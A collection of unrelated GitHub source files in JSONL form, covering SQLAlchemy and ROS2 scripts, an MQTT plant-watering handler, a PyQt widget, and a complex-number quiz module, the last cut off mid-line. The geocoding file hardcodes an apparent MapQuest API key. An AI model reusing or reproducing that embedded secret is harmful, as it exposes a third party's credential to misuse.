+{"seq_id":"8652410095","text":"#!/usr/bin/python3\n\n\"\"\"\nPrint the state object id\n\"\"\"\n\nimport sys\nfrom model_state import Base, State\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\n\nif __name__ == \"__main__\":\n engine = create_engine(\n \"mysql+mysqldb://{}:{}@localhost/{}\".format(\n sys.argv[1], sys.argv[2], sys.argv[3]\n ),\n pool_pre_ping=True,\n )\n Base.metadata.create_all(engine)\n\n session = Session(engine)\n found = False\n for state in (\n session.query(State).filter(State.name == sys.argv[4]).\n order_by(State.id)\n ):\n if state:\n print(f\"{state.id}\")\n found = True\n break\n if not found:\n print(\"Not found\")\n session.close()\n","repo_name":"Camaltra/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22707923645","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\n\n\nfrom launch import LaunchDescription\nfrom launch.actions import IncludeLaunchDescription, TimerAction\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\n\nfrom launch_ros.actions import Node\nfrom launch.substitutions import Command\nfrom launch_ros.descriptions import ParameterValue\n\nfrom launch.actions import RegisterEventHandler\nfrom launch.event_handlers import OnProcessStart\n\ndef generate_launch_description():\n package_name='oscar_ros'\n\n rsp = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([os.path.join(\n get_package_share_directory(package_name),'launch','rsp.launch.py'\n )]), launch_arguments={'use_sim_time': 'True', 'use_ros2_control': 'True'}.items()\n )\n\n robot_description = Command(['ros2 param get --hide-type /robot_state_publisher robot_description'])\n\n controller_params_file = os.path.join(get_package_share_directory(package_name),'config','my_controllers.yaml')\n\n controller_manager = Node(\n package=\"controller_manager\",\n executable=\"ros2_control_node\",\n parameters=[{'robot_description': ParameterValue(robot_description, value_type=str)},\n controller_params_file, {'use_sim_time': True}]\n )\n\n delayed_controller_manager = TimerAction(period=0.5, actions=[controller_manager])\n\n diff_drive_spawner = Node(\n package=\"controller_manager\",\n executable=\"spawner\",\n arguments=[\"diff_cont\"],\n )\n\n delayed_diff_drive_spawner = RegisterEventHandler(\n event_handler=OnProcessStart(\n target_action=controller_manager,\n on_start=[diff_drive_spawner],\n )\n )\n\n joint_broad_spawner = Node(\n package=\"controller_manager\",\n executable=\"spawner\",\n arguments=[\"joint_broad\"],\n )\n\n delayed_joint_broad_spawner = RegisterEventHandler(\n event_handler=OnProcessStart(\n target_action=controller_manager,\n on_start=[joint_broad_spawner],\n )\n )\n robot_localization_node = Node(\n package='robot_localization',\n executable='ekf_node',\n name='ekf_filter_node',\n output='screen',\n parameters=[os.path.join(get_package_share_directory(package_name), 'config/ekf.yaml'), {'use_sim_time': True}]\n )\n\n delayed_robot_localization_spawner = RegisterEventHandler(\n event_handler=OnProcessStart(\n target_action=diff_drive_spawner,\n on_start=[robot_localization_node],\n )\n )\n\n\n # Launch them all!\n return LaunchDescription([\n rsp,\n delayed_controller_manager,\n delayed_diff_drive_spawner,\n delayed_joint_broad_spawner,\n delayed_robot_localization_spawner\n ])\n","repo_name":"brow1633/oscar_ros","sub_path":"launch/launch_sim.launch.py","file_name":"launch_sim.launch.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32719436685","text":"import gdb\n\n\nclass QuitCommand(gdb.Command):\n\n _quit_tpl = 'quit {code}'.format\n _error = '128+$_siginfo.si_signo'\n _code = '$_exitcode'\n\n def __init__(self):\n super().__init__('quit_command', gdb.COMMAND_NONE)\n\n def invoke(self, _, from_tty):\n sig_info = gdb.parse_and_eval('$_siginfo')\n code = self._code if sig_info.type.name == 'void' else self._error\n gdb.execute(self._quit_tpl(code=code), from_tty=from_tty)\n\n\nclass InitCommand(gdb.Command):\n\n _init_commands = (\n 'handle SIG38 nostop noprint pass',\n 'set breakpoint pending on',\n 'set confirm off',\n 'set prompt',\n 'maint set internal-error quit yes',\n 'maint set internal-error corefile no',\n 'set backtrace limit 25',\n 'set print elements 10',\n 'set python print-stack full',\n 'set trace-commands on',\n 'set overload-resolution off',\n )\n\n def __init__(self):\n super().__init__('init_command', gdb.COMMAND_NONE)\n\n def invoke(self, _, from_tty):\n for command in self._init_commands:\n gdb.execute(command, from_tty=from_tty)\n\n\nInitCommand()\nQuitCommand()\n\n\n# '-ex', 'print $_siginfo',\n# '-ex', 'info locals',\n# '-ex', 'info registers',\n# '-ex', 'backtrace full',\n# '-ex', 'disassemble',\n# '-ex', 'symbol-file',\n# '-ex', 'sharedlibrary',\n# '-ex', 'info proc mappings',\n# '-ex', 'info threads',\n# '-ex', 'shared',\n# '-ex', 'info sharedlibrary',\n# gdb.execute('info sharedlibrary', from_tty=from_tty, to_string=True)\n# gdb.execute('info registers', from_tty=from_tty, to_string=True)\n","repo_name":"PrVrSs/eibon","sub_path":"eibon/gdb_commands.py","file_name":"gdb_commands.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38910294055","text":"import json\nimport topics\nimport datetime\nimport pytz\nimport time\n\n\nclass Handler:\n def __init__(self):\n pass\n\n def set_mqtt_client(self, mqtt):\n self.mqtt_client = mqtt.client\n\n def set_basil_database(self, mongodbclient):\n self.basil_db = mongodbclient.basil_db\n self.moisture_sensor_reading = self.basil_db.moisture_sensor_reading\n self.pump_water_status = self.basil_db.pump_water_status\n\n def moisture_analog_topic(self, topic, msg):\n # FIXME: For some reasons json.loads converting string to string, not dict\n # As a workaround I am being forced to call it twice\n # Find what's the bug, and fix it.\n json_msg = json.loads(json.loads(msg))\n # In embedded systems, epoch time is from year 2000, that's why +946684800\n json_msg[\"timestamp\"] = json_msg[\"timestamp\"]+946684800\n try:\n id = self.moisture_sensor_reading.insert_one(json_msg).inserted_id\n print(\"New Moisture sensor reading added\", id)\n except Exception as e:\n print(\"Error while inserting moisture sensor reading\", e)\n raise(e)\n\n def pump_water_topic(self, topic, msg):\n # FIXME: For some reasons json.loads converting string to string, not dict\n # As a workaround I am being forced to call it twice\n # Find what's the bug, and fix it.\n json_msg = json.loads(json.loads(msg))\n # In embedded systems, epoch time is from year 2000, that's why +946684800\n json_msg[\"timestamp\"] = json_msg[\"timestamp\"]+946684800\n try:\n id = self.pump_water_status.insert_one(json_msg).inserted_id\n print(\"New pump water status added\", id)\n except Exception as e:\n print(\"Error while inserting pump water status\", e)\n raise(e)\n\n def set_moisture_reading_frequency(self, frequency=30):\n json_msg = {\n \"frequency\": frequency\n }\n try:\n print(\"Publishing set moisture read frequency command\")\n self.mqtt_client.publish(\n topics.BASIL_MOISTURE_FREQ_COMMAND_TOPIC, json.dumps(json_msg))\n except Exception as e:\n print(\"Error while publishing set moisture read frequency with msg\", json_msg)\n\n def start_pump(self, duration=0):\n json_msg = {\n \"command\": \"ON\",\n \"duration\": duration\n }\n try:\n print(\"Publishing start pump command\")\n self.mqtt_client.publish(\n topics.PUMP_ONOFF_COMMAND_TOPIC, json.dumps(json_msg))\n except Exception as e:\n print(\"Error while publishing start pump comamnd with msg\", json_msg)\n\n def stop_pump(self):\n json_msg = {\n \"command\": \"OFF\",\n }\n try:\n print(\"Publishing stop pump command\")\n self.mqtt_client.publish(\n topics.PUMP_ONOFF_COMMAND_TOPIC, json.dumps(json_msg))\n except Exception as e:\n print(\"Error while publishing stop pump comamnd with msg\", json_msg)\n\n def get_moisture_reading_data(self, from_time, interval=\"hourly\"):\n common_pipeline = [\n {\n \"$match\": {\n \"timestamp\": {\"$gt\": from_time},\n }\n },\n {\n \"$project\": {\n \"timestamp\": {\n \"$toDate\": {\n \"$multiply\": [\n '$timestamp', 1000]\n }\n },\n \"analog_value\":1,\n \"moisture_level\":1\n }\n },\n ]\n pipeline = {\n \"minutely\": [\n *common_pipeline,\n {\n \"$project\": {\n \"timestamp\": 1, \"timestampMinute\": {\n \"$minute\": \"$timestamp\"\n },\n \"timestampHour\": {\n \"$hour\": \"$timestamp\"\n }, \"analog_value\": 1, \"moisture_level\": 1\n }\n },\n {\n \"$group\": {\n \"_id\": {\n \"minute\": \"$timestampMinute\",\n \"hour\": \"$timestampHour\"\n },\n \"value\": {\n \"$avg\": \"$analog_value\"\n }\n }\n },\n {\n \"$sort\": {\n \"_id.hour\": 1, \"_id.minute\": 1\n }\n }\n ],\n \"hourly\": [\n *common_pipeline,\n {\n \"$project\": {\n \"timestamp\": 1,\n \"timestampHour\": {\n \"$hour\": \"$timestamp\"\n },\n \"timestampDay\": {\n \"$dayOfMonth\": \"$timestamp\"\n },\n \"analog_value\": 1,\n \"moisture_level\": 1\n }\n },\n {\n \"$group\": {\n \"_id\": {\n \"hour\": \"$timestampHour\",\n \"day\": \"$timestampDay\"\n },\n \"value\": {\n \"$avg\": \"$analog_value\"\n }\n }\n },\n {\n \"$sort\": {\n \"_id.day\": 1, \"_id.hour\": 1\n }\n }\n ]\n }\n data = self.moisture_sensor_reading.aggregate(pipeline[interval])\n return list(data)\n\n def get_water_status(self, count):\n data = self.pump_water_status.find({}).sort(\"timestamp\").limit(count)\n return map(lambda x: {\"timestamp\": time.strftime('%d %b %H:%M', time.localtime(x[\"timestamp\"])), \"duration\": x[\"duration\"]}, list(data))\n","repo_name":"itachiRedhair/smart-plant","sub_path":"web/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":6093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16116202386","text":"from PyQt4.QtGui import QTextEdit, QSizePolicy, QWidget\nfrom PyQt4.QtCore import QSize\nfrom lunchinator.log.logging_slot import loggingSlot\n\nclass GrowingTextEdit(QTextEdit):\n def __init__(self, parent, heightMax = 1000):\n super(GrowingTextEdit, self).__init__(parent) \n self.document().contentsChanged.connect(self.sizeChange)\n\n self.heightMin = 0\n self.heightMax = heightMax\n self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Maximum)\n self.sizeChange()\n\n def resizeEvent(self, event):\n self.sizeChange()\n return super(GrowingTextEdit, self).resizeEvent(event)\n\n def setDocHeight(self, height):\n self.setMinimumHeight(height)\n self.setMaximumHeight(height)\n\n @loggingSlot()\n def sizeChange(self):\n docHeight = self.document().size().height()\n if self.heightMin <= docHeight <= self.heightMax:\n self.setDocHeight(docHeight + 2)\n elif docHeight < self.heightMin:\n self.setDocHeight(self.heightMin)\n else:\n self.setDocHeight(self.heightMax)\n \n def setVisible(self, *args, **kwargs):\n QTextEdit.setVisible(self, *args, **kwargs)\n self.sizeChange()\n \n def sizeHint(self):\n return QSize(QWidget.sizeHint(self).width(), self.minimumHeight())\n \n","repo_name":"hannesrauhe/lunchinator","sub_path":"lunchinator/growing_text_edit.py","file_name":"growing_text_edit.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30181690596","text":"import requests\n\n# for getting the coordinate of particular address, mapquest api is used\n\n# API Secret Key\ncoordinateApiKey = \"zQ85GG9vCz4xzvnERTYULLpsseGstaok\"\n\n# API end point with query ?location=\ncoordinateApi = f\"http://www.mapquestapi.com/geocoding/v1/address?key={coordinateApiKey}&location=\"\n\n\n# it returns the address information along with coordinates and address \n# It's take 3 parameter and use them as location query for api \n\ndef getCoordinate(name, addressLine, city, state):\n mainCoordinateApi = f\" {coordinateApi}{addressLine},{city},{state}\"\n r = requests.get(mainCoordinateApi)\n locationData = r.json()[\"results\"][0][\"locations\"][0]\n return locationData","repo_name":"DhamaniSaranya/Address-Book-FastApi","sub_path":"app/get_Coordinates.py","file_name":"get_Coordinates.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35874403189","text":"#Task 2\npl = int(input('Количество тарелок: '))\nsr = int(input('Количество моющего средства: '))\ni = 0\nwhile sr > 0:\n pl = pl - 1\n sr = sr - 0.5\n i = i + 1\n\n print('Вымыто', i, 'тарелок. Осталось средства:', sr)\n\n if pl == 0:\n break\n \nprint('Моющее средство закончилось. Осталось', pl, 'невымытых тарелок') if pl > 0 else print('Все тарелки вымыты. Осталось неизрасходованного средства:', sr)\n","repo_name":"MNaugolnov/hw","sub_path":"hw1-2.py","file_name":"hw1-2.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73636332587","text":"#!/usr/bin/env python2\n# -*- coding: UTF-8 -*-\n\"\"\"\n Complexity: quizzes/the_modulus.py\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n Contains a quiz implementation (`Quiz`) for the modulus topic.\n\n\"\"\"\n\nimport random\n\nfrom flask import request\n\nfrom . import BaseQuiz\nfrom ..maths import *\nfrom ..maths.complex import (compute_modulus, compute_product,\n compute_divide)\nfrom ..errors import BadRequestError\n\nclass DuplicateAnswerError(Exception):\n pass\n\nclass MultipleChoiceQuestion(object):\n \"\"\"\n Inherited by questions with a multiple choice structure.\n\n Each question has three parts. For each part, a choice of\n three answers is provided; a correct one and two wrong ones.\n\n Once inherited the child class has to define the following\n instance varibles:\n\n :ivar data: Dictionary of variable definitions needed to answer\n the question.\n\n :ivar parts: A list of `tuple`s for each part of the question.\n The first element being the `MathOperand`\n representing the question and the second a list of\n `MathOperand`s containing the correct answer\n followed by two incorrect answers.\n \"\"\"\n def __init__(self):\n self.answered = False\n self.score = 0\n self.results = []\n\n # Cache Question.\n try:\n self.question\n except DuplicateAnswerError:\n self.__dict__ = {}\n self.__init__()\n\n @staticmethod\n def _make_part(part):\n \"\"\"\n Renders an randomises part and puts it into the correct\n format to be sent.\n\n :param part: A `tuple`, from `self.parts`.\n\n :returns: A `tuple` containing the rendered question, a\n shuffled list of the answers rendered and\n the index of the correct answer in that list.\n \"\"\"\n question, answers = part\n\n # Render the question.\n question = question.render()\n # Render the possible answers.\n answers = map(lambda expr: str(expr.render()), answers)\n\n if len(answers) != len(set(answers)):\n raise DuplicateAnswerError\n\n # Take out the correct answer.\n correct_answer = answers.pop(0)\n # Choose a random index.\n correct_answer_index = random.randrange(0, 3)\n # Place the correct answer in at that random index.\n answers.insert(correct_answer_index, correct_answer)\n\n return question, answers, correct_answer_index\n\n @property\n def question(self):\n \"\"\"\n :returns: A `tuple` of all `self.parts` rendered and ready\n to be sent.\n \"\"\"\n\n # Only generate if they have not been generated before.\n if not hasattr(self, '_question'):\n self._question = map(self._make_part, self.parts)\n\n return self._question\n\n def ask(self):\n \"\"\"\n :returns: The whole question to be asked with data.\n \"\"\"\n return dict(\n data=self.data,\n question=self.question\n )\n\n def answer(self, request_data):\n \"\"\"\n Answer the question.\n\n :param request_data: A dictionary containing the loaded\n data from JSON inside the request.\n\n :returns: The total score and results for the question.\n \"\"\"\n if self.answered:\n raise ValueError\n\n # Get the answer data.\n answer = request_data['answer']\n\n # Process each part.\n for i in xrange(len(self.parts)):\n\n correct = answer[i][0] == self._question[i][2]\n\n # Save result.\n self.results.append(correct)\n\n # If correct add 5 to the score.\n if correct:\n self.score += 5\n\n self.answered = True\n return self.score, self.results\n\n\nclass ModulusProductQuestion(MultipleChoiceQuestion):\n \"\"\"\n Question for the modulus's product.\n \"\"\"\n def __init__(self, *args, **kwargs):\n # Variables used to represent questions.\n self.z_var = MathsVariable('z')\n self.w_var = MathsVariable('w')\n self.zw_var = MathsExpression([\n self.z_var,\n self.w_var\n ],\n operators.multiply\n )\n\n # Per-Question random variable definitions.\n self.z = MathsComplexNumber(\n MathsRandomConstant(1, 11),\n MathsRandomConstant(1, 11)\n )\n self.w = MathsComplexNumber(\n MathsRandomConstant(1, 11),\n MathsRandomConstant(1, 11)\n )\n self.zw = compute_product(self.z, self.w)\n\n # Required `MultipleChoiceQuestion` instance varibles.\n self.data = dict(z=self.z.render(), w=self.w.render())\n self.parts = [self.part_one, self.part_two, self.part_three]\n\n # Call the inherited class's __init__\n super(ModulusProductQuestion, self).__init__(*args, **kwargs)\n\n @property\n def part_one(self):\n \"\"\"\n Part one of the question. What is 'zw'?\n \"\"\"\n\n # The answers are placed in a functions\n # to clearly separate the logic from the question.\n\n def answers():\n\n # Compute vars for random number generation.\n # For both the real part...\n step_re = int(self.zw.re * 0.1)\n if step_re < 1:\n step_re = 1\n start_re = int(self.zw.re - step_re*10)\n end_re = int(self.zw.re + step_re*10)\n\n # ....and imaginary part.\n step_im = int(self.zw.im * 0.1)\n if step_im < 1:\n step_im = 1\n start_im = int(self.zw.im - step_im*10)\n end_im = int(self.zw.im + step_im*10)\n\n # Generate wrong answers.\n wrong_answers = [\n MathsComplexNumber(\n MathsRandomConstant(start_re, end_re, step_re),\n MathsRandomConstant(start_im, end_im, step_im)\n ) for _ in xrange(2)\n ]\n\n return [self.zw] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_one'):\n # question = 'zw'\n question = self.zw_var\n\n self._part_one = question, answers()\n \n return self._part_one\n\n @property\n def part_two(self):\n \"\"\"\n Part two of the question. What is '|zw|'?\n \"\"\"\n\n # The question and answers are placed in different functions\n # to clearly separate the logic for each.\n\n def answers():\n zw_mod = compute_modulus(self.zw)\n\n # Remove the square root.\n zw_mod_squared = zw_mod.operands[0]\n\n # Compute vars for random number generation.\n step = int(zw_mod_squared.render() * 0.1)\n if step < 1:\n step = 1\n start = int(zw_mod_squared.render() - step*10)\n end = int(zw_mod_squared.render() + step*10)\n\n # Generate random numbers.\n wrong_answers = [\n MathsExpression(\n MathsRandomConstant(start, end, step),\n operators.sqrt\n ) for _ in xrange(2)\n ]\n\n return [zw_mod] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_two'):\n # question = '|zw|'\n question = MathsExpression(\n self.zw_var,\n operators.abs\n )\n\n self._part_two = question, answers()\n\n return self._part_two\n\n @property\n def part_three(self):\n \"\"\"\n Part three of the question. What is '|z||w|'?\n\n NOTE: There is a pattern here that the user might detect,\n and solve this question quicker. Basically the\n answer to this is the same as `self.part_two` because\n |zw| = |z||w|. It is down to the quiz object to\n detect this, then the `self.pattern` method can be\n used.\n \"\"\"\n\n # The question and answers are placed in different functions\n # to clearly separate the logic for each.\n\n def question():\n # |z|\n z_mod_var = MathsExpression([\n MathsVariable('z'),\n ], operators.abs\n )\n # |w|\n w_mod_var = MathsExpression([\n MathsVariable('w'),\n ], operators.abs\n )\n\n # |z||w|\n return MathsExpression([\n z_mod_var, w_mod_var\n ], operators.multiply\n )\n\n def answers():\n # |a + bj| = sqrt(a*a + b*b)\n z_mod = compute_modulus(self.z)\n w_mod = compute_modulus(self.w)\n\n # |a + bj|^2 = a*a + b*b.\n z_mod_squared = z_mod.operands[0]\n w_mod_squared = w_mod.operands[0]\n\n # |a + bj|^2 |c + dj|^2 = (a*a + b*b)(c*c + d*d)\n z_mod_squared_w_mod_squared = MathsConstant(\n z_mod_squared.render() * w_mod_squared.render()\n )\n\n # |a + bj||c + dj| = sqrt[ (a*a + b*b) (c*c + d*d) ]\n z_mod_w_mod = MathsExpression(\n z_mod_squared_w_mod_squared,\n operators.sqrt\n )\n\n # Compute vars for random numbers.\n step = int(z_mod_squared_w_mod_squared.render() * 0.1)\n if step < 1:\n step = 1\n start = int(z_mod_squared_w_mod_squared.render() - step*10)\n end = int(z_mod_squared_w_mod_squared.render() + step*10)\n\n # Generate wrong answers.\n wrong_answers = [\n MathsExpression(\n MathsRandomConstant(start, end, step),\n operators.sqrt\n ) for _ in xrange(2)\n ]\n\n return [z_mod_w_mod] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_three'):\n self._part_three = question(), answers()\n\n return self._part_three\n\n def pattern(self, user_answer=None):\n \"\"\"\n Ask about the pattern in the question.\n\n :param user_answer: The user's answer.\n\n :returns: Possible answers or, if `user_answer` is provided,\n whether the user is correct.\n \"\"\"\n # Helper function\n equal = lambda exp1, exp2: '{} = {}'.format(exp1.render(),\n exp2.render())\n\n # A few algebraic expressions.\n z_mod_var = MathsExpression(self.z_var, operators.abs)\n w_mod_var = MathsExpression(self.w_var, operators.abs)\n z_mod_w_mod_var = MathsExpression([\n z_mod_var,\n w_mod_var\n ])\n zw_mod_var = MathsExpression(self.zw_var, operators.abs)\n\n # The possible answers\n correct_answer = equal(zw_mod_var, z_mod_w_mod_var)\n incorrect_answer_one = equal(z_mod_var, w_mod_var)\n incorrect_answer_two = equal(z_mod_var, zw_mod_var)\n\n # If answering the question return the result.\n if user_answer is not None:\n return correct_answer == user_answer\n\n # Shuffle answers.\n answers = [\n correct_answer,\n incorrect_answer_one,\n incorrect_answer_two\n ]\n random.shuffle(answers)\n\n return answers\n\n\nclass ModulusDivisionQuestion(MultipleChoiceQuestion):\n \"\"\"\n Question for division with the modulus.\n \"\"\"\n def __init__(self, *args, **kwargs):\n # Variables used to represent questions.\n self.z_var = MathsVariable('z')\n self.w_var = MathsVariable('w')\n self.z_div_w_var = MathsExpression([\n self.z_var,\n self.w_var\n ],\n operators.divide\n )\n\n # Per-Question random variable definitions.\n self.z = MathsComplexNumber(\n MathsRandomConstant(1, 11),\n MathsRandomConstant(1, 11)\n )\n self.w = MathsComplexNumber(\n MathsRandomConstant(1, 11),\n MathsRandomConstant(1, 11)\n )\n self.z_div_w = compute_divide(self.z, self.w)\n\n # Required `MultipleChoiceQuestion` instance varibles.\n self.data = dict(z=self.z.render(), w=self.w.render())\n self.parts = [self.part_one, self.part_two, self.part_three]\n\n # Call the inherited class's __init__\n super(\n ModulusDivisionQuestion,\n self\n ).__init__(*args, **kwargs)\n\n @property\n def part_one(self):\n \"\"\"\n Part one of the question. What is 'z / w'?\n \"\"\"\n\n # The answers are placed in a functions\n # to clearly separate the logic from the question.\n\n def answers():\n\n # Compute vars for random number generation.\n # For both the real part...\n step_re = int(self.z_div_w.re)\n if step_re < 1:\n step_re = 1\n start_re = int(self.z_div_w.re - step_re*10)\n end_re = int(self.z_div_w.re + step_re*10)\n\n # ....and imaginary part.\n step_im = int(self.z_div_w.im)\n if step_im < 1:\n step_im = 1\n start_im = int(self.z_div_w.im - step_im*10)\n end_im = int(self.z_div_w.im + step_im*10)\n\n # Generate wrong answers.\n wrong_answers = [\n MathsComplexNumber(\n MathsRandomConstant(start_re, end_re, step_re),\n MathsRandomConstant(start_im, end_im, step_im)\n ) for _ in xrange(2)\n ]\n\n return [self.z_div_w] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_one'):\n # question = 'z / w'\n question = self.z_div_w_var\n\n self._part_one = question, answers()\n\n return self._part_one\n\n @property\n def part_two(self):\n \"\"\"\n Part two of the question. What is '|z / w|'?\n \"\"\"\n\n # The question and answers are placed in different functions\n # to clearly separate the logic for each.\n\n def answers():\n z_div_w_mod = compute_modulus(self.z_div_w)\n\n # Remove the square root.\n z_div_w_mod_squared = z_div_w_mod.operands[0]\n\n # Compute vars for random number generation.\n step = int(z_div_w_mod_squared.render())\n if step < 1:\n step = 1\n start = int(z_div_w_mod_squared.render() - step*10)\n end = int(z_div_w_mod_squared.render() + step*10)\n\n # Generate random numbers.\n wrong_answers = [\n MathsExpression(\n MathsRandomConstant(start, end, step),\n operators.sqrt\n ) for _ in xrange(2)\n ]\n\n return [z_div_w_mod] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_two'):\n # question = '|zw|'\n question = MathsExpression(\n self.z_div_w_var,\n operators.abs\n )\n\n self._part_two = question, answers()\n\n return self._part_two\n\n @property\n def part_three(self):\n \"\"\"\n Part three of the question. What is '|z| / |w|'?\n\n NOTE: There is a pattern here that the user might detect,\n and solve this question quicker. Basically the\n answer to this is the same as `self.part_two` because\n |z/w| = |z|/|w|. It is down to the quiz object to\n detect this, then the `self.pattern` method can be\n used.\n \"\"\"\n\n # The question and answers are placed in different functions\n # to clearly separate the logic for each.\n\n def question():\n # |z|\n z_mod_var = MathsExpression([\n MathsVariable('z'),\n ], operators.abs\n )\n # |w|\n w_mod_var = MathsExpression([\n MathsVariable('w'),\n ], operators.abs\n )\n\n # |z| / |w|\n return MathsExpression([\n z_mod_var, w_mod_var\n ], operators.divide\n )\n\n def answers():\n correct = self.part_two[1][0]\n correct_squared = correct.operands[0]\n\n # Compute vars for random numbers.\n step = int(correct_squared.render())\n if step < 1:\n step = 1\n start = int(correct_squared.render() - step*10)\n end = int(correct_squared.render() + step*10)\n\n # Generate wrong answers.\n wrong_answers = [\n MathsExpression(\n MathsRandomConstant(start, end, step),\n operators.sqrt\n ) for _ in xrange(2)\n ]\n\n return [correct] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_three'):\n self._part_three = question(), answers()\n\n return self._part_three\n\n def pattern(self, user_answer=None):\n \"\"\"\n Ask about the pattern in the question.\n\n :param user_answer: The user's answer.\n\n :returns: Possible answers or, if `user_answer` is provided,\n whether the user is correct.\n \"\"\"\n # Helper function\n equal = lambda exp1, exp2: '{} = {}'.format(exp1.render(),\n exp2.render())\n\n # A few algebraic expressions.\n z_mod_var = MathsExpression(self.z_var, operators.abs)\n w_mod_var = MathsExpression(self.w_var, operators.abs)\n z_mod_div_w_mod_var = MathsExpression([\n z_mod_var,\n w_mod_var\n ], operators.divide)\n z_div_w_mod_var = MathsExpression(self.z_div_w_var, operators.abs)\n\n # The possible answers\n correct_answer = equal(z_div_w_mod_var, z_mod_div_w_mod_var)\n incorrect_answer_one = equal(z_mod_var, w_mod_var)\n incorrect_answer_two = equal(z_mod_var, z_div_w_mod_var)\n\n # If answering the question return the result.\n if user_answer is not None:\n return correct_answer == user_answer\n\n # Shuffle answers.\n answers = [\n correct_answer,\n incorrect_answer_one,\n incorrect_answer_two\n ]\n random.shuffle(answers)\n\n return answers\n\n\nclass PatternState(object):\n \"\"\"\n Enum like object for representing the state of patterns being\n spotted.\n \"\"\"\n\n not_spotted, spotted, confirmed = range(3)\n\n\nclass Quiz(BaseQuiz):\n \"\"\"\n The Modulus Quiz.\n\n Contents:\n ModulusProductQuestion * 3,\n ModulusDivisionQuestion * 3\n\n \"\"\"\n def __init__(self):\n self.questions = [\n (ModulusProductQuestion, 3),\n (ModulusDivisionQuestion, 3)\n ]\n self.repeat_limit = 0\n self.repeat_count = 0\n self.score = 0\n self.prev_resp_time = None\n self.pattern = PatternState.not_spotted\n super(Quiz, self).__init__()\n\n def next(self, json=None):\n \"\"\"\n Handle request to '/the_modulus/_next'.\n \"\"\"\n if self.pattern == PatternState.not_spotted and\\\n self.question is None:\n return self.finish()\n\n # Separate GET and POST requests.\n return {\n 'GET': self.get_question,\n 'POST': self.answer_question,\n }[request.method](json)\n\n @property\n def question(self):\n # Check if there is still a question loaded that has not been\n # answered.\n if hasattr(self, '_question'):\n if not self._question.answered or self.pattern != PatternState.not_spotted:\n return self._question\n\n # Check if the current question type is finished or needs to\n # be repeated.\n if not hasattr(self, '_Question') or self.repeat_count >= self.repeat_limit:\n\n if len(self.questions) == 0:\n # Finished!\n return None\n\n # Go to next question type.\n self.repeat_count = 0\n self.prev_resp_time = None\n self.pattern = PatternState.not_spotted\n self._Question, self.repeat_limit = self.questions.pop(0)\n\n # Create new instance of `self._Question` at `self._question`\n self.repeat_count += 1\n self._question = self._Question()\n return self._question\n\n def get_question(self, _=None):\n \"\"\"\n Handle: GET /the_modulus/_next\n \"\"\"\n\n # As error message says below.\n if self.pattern != PatternState.not_spotted:\n raise BadRequestError(\n \"Can't get more questions until the pattern has \" +\n \"been processed.\"\n )\n\n response = self.question.ask()\n response['finish'] = False\n return response\n\n def answer_question(self, json):\n \"\"\"\n Handle: POST /the_modulus/_next\n \"\"\"\n\n # Data is needed when answering a question.\n if json is None:\n BadRequestError(\"No data!\")\n\n # When a pattern is spotted.\n if self.pattern != PatternState.not_spotted:\n\n # If the users says they know the pattern.\n if self.pattern == PatternState.confirmed:\n\n # If correct they get all the remaining points plus\n # an additional 5.\n score = 5 + (\n (self.repeat_limit - self.repeat_count) *\n len(self.question.parts) * 5\n )\n\n if 'answer' not in json:\n raise BadRequestError('Expected answer.')\n\n # If correct they get the points.\n if self._question.pattern(json['answer']):\n self.score += score\n\n # Else they loose all remaining points.\n\n # Either way, go to the next question.\n self.pattern = PatternState.not_spotted\n self.repeat_count = self.repeat_limit\n\n return dict(score=self.score)\n\n # Only other option is they are confirming whether or\n # not they know the pattern.\n if json.get('spotted', False):\n # If they say they know the pattern, return the\n # pattern question.\n self.pattern = PatternState.confirmed\n return dict(patterns=self.question.pattern())\n\n # So they don't yet know the pattern.\n self.pattern = PatternState.not_spotted\n return {}\n\n # A question must be being answered. If not, something has\n # gone wrong.\n if 'answer' not in json:\n raise BadRequestError('Expected answer.')\n\n # Answer question.\n score, results = self.question.answer(json)\n self.score += score\n\n # A pattern may have been spotted if the response time is\n # less than the previous.\n resp_time = json['answer'][-1][1]\n if self.prev_resp_time is not None and results[-1]:\n if resp_time < self.prev_resp_time:\n self.pattern = PatternState.spotted\n\n # Save previous response time to last question if correct.\n self.prev_resp_time = resp_time if results[-1] else None\n\n return dict(\n score=self.score,\n spotted=self.pattern\n )\n\n def finish(self, name=None):\n \"\"\"\n Finish quiz, save scores\n \"\"\"\n self.ended = True\n if name is None:\n return dict(finish=True)\n\n return (self.score, 